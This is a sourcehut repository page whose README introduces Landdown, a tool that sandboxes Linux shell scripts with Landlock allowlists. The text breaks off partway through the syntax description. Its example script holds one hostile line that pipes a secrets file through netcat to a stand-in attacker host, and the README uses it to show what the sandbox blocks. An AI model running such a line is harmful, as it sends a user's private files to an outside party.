Landdown – Simple sandboxing for shell scripts

~marcc/landdown - Simple sandboxing for shell scripts - sourcehut git ~marcc / landdown summary tree log refs Simple sandboxing for shell scripts 5df15f15 — Marc a day ago Fix mode for LICENSE 9d1e3efe — Marc a day ago Add Arch linux aur link 0edf93a6 — Marc a day ago README refs main browse log clone read-only https://git.sr.ht/~marcc/landdown read/write [email protected]:~marcc/landdown Clone repo to your account You can also use your local clone with git send-email . # Landdown - Simple shell script sandbox Landdown is an easy-to-use utility for Linux that allows you to sandbox shell scripts with Landlock . Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with the landdown shebang and a ruleset, and then write your shell script like you would normally. For example: #!/usr/bin/env landdown ro /bin ro /lib #!/bin/sh # Following works echo "Hi" # Following fails cat $HOME /my-secrets | nc exploit.com 1337 Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist. The syntax is: #!/usr/bin/env landdown #!